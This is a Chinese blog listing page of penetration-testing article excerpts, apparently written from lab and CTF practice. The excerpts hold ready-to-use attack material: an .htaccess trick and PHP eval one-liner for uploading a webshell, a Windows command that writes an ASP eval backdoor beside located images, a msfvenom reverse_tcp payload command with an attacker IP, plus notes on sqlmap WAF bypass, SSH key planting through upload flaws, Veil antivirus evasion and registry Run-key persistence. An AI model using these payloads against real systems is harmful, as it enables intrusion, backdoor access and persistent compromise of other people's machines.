![](https://img-blog.csdnimg.cn/20190927151124774.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
渗透精华
文章平均质量分 80
天行健 君子以自强不息
qq_40624810
只想开心点
展开
-
.htacess文件利用,上传webshell
背景:在做墨者靶场一道文件上传的题目遇见的,有一种做法利用php3、php5后缀绕过。还有就是这种利用.htacess文件去上传webshell。参考博客:https://blog.csdn.net/jokerhappy/article/details/107838541SetHandler application/x-httpd-http上述代码写入文件,上传文件抓包将文件名改为..htacess,发送编写一句话木马如下:<?php @eval($_POST['joke原创 2020-11-10 09:31:10 · 660 阅读 · 0 评论 -
利用shell写入一句话
for %i in (d) do (cd /d %i:\ & (for /r %j in (*050.jpg) do echo ^<%eval request^(chr^(35^)^)%^>>%~dpjK.asp)遍历050.jpg,找到后在同级目录下写入一句话。注意:050.jpg替换为要渗透网站中可以知道目录的图片,密码为chr35 解码后的#然后就可以用菜刀连接...原创 2020-11-09 08:54:49 · 296 阅读 · 0 评论 -
Sqlmap小技巧
在sqlmap无数次没跑出来数据,不是连接失败、各种error后。我果断放弃了sqlmap用超级注入工具,超级注入工具他不香嘛!直到深入了解了下sqlmap后才发现自己的愚昧无知。就他娘会用个sqlmap -u "" --dbs,能跑出来才怪一、tamper脚本很多站点有waf或者过滤,只要在sqlmap 注入语句后加入小小的一个--tamper +脚本文件,就可以绕过很多waf了。脚本文件sqlmap中有自带的,你也可以网上找加到文件中。二、force--ssl这个参数以前老大..转载 2020-07-24 00:28:47 · 1272 阅读 · 0 评论 -
利用公钥实现SSH免密登录
一、背景看了B站视频,了解到新姿势。SSH免密登录可以在遇到文件上传漏洞时使用,需要的条件比较多。目标开始了ssh服务,且存在上传漏洞。我们就可以通过上传漏洞实现ssh免密登录。二、原理ssh远程连接我知道的有两种方式。一是通过账号密码,二是通过公私钥。我们产生一对密钥对,分为公钥和私钥。将公钥上传到要登录的服务器,然后通过私钥远程连接服务器就可以实现免密登录了。三、实现1、账号密码登录首先我们看看常规的账户密码形式的远程登录。我们就可以登录到服务器了,可是在渗透过程显然无法原创 2020-07-14 19:28:12 · 1491 阅读 · 0 评论 -
文件上传漏洞利用
一、背景B站看了个up靶机练习的视频,学习到新东西写下来。如有侵权,联系马上删除!视频:https://www.bilibili.com/video/BV1Tg4y1B7TT(up主才12岁,真是自愧不如!)二、原理找到一处上传点,上传shell,利用msfvenom生成。msfvenom -p php/meterpreter/revese_tcp LHOST=192.168.3.171 LPORT=4444 -f raw > shell.php本来上传后,利用msfcon原创 2020-07-14 01:08:15 · 398 阅读 · 0 评论 -
Veil生成免杀payload 渗透win10 获取靶机shell
一:实验环境两台机器处于同网段攻击机:kali 192.168.115.134靶机:win10 192.168.115.1二:Veil下载、安装、使用kali里默认没有安装Veil,我们通过命令行安装: apt-get update && apt-get install veil安装过程有点漫长,如果用的国内源可能会快点。安装完成后启动Veil...原创 2019-08-04 15:07:48 · 1836 阅读 · 9 评论 -
注册表设置开机自启项
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v winrar /t reg_sz /d "C:\Users\HOME\Desktop\k.exe" /f在注册表设置C:\Users\HOME\Desktop\k.exe为开启自启项目,可以在任务管理器中的启动里禁用,也可以在注册表里找到...原创 2019-08-07 19:58:13 · 2122 阅读 · 0 评论 -
DHCP的攻击和防御
转https://cloud.tencent.com/developer/article/1197597转载 2018-12-15 00:09:17 · 3773 阅读 · 0 评论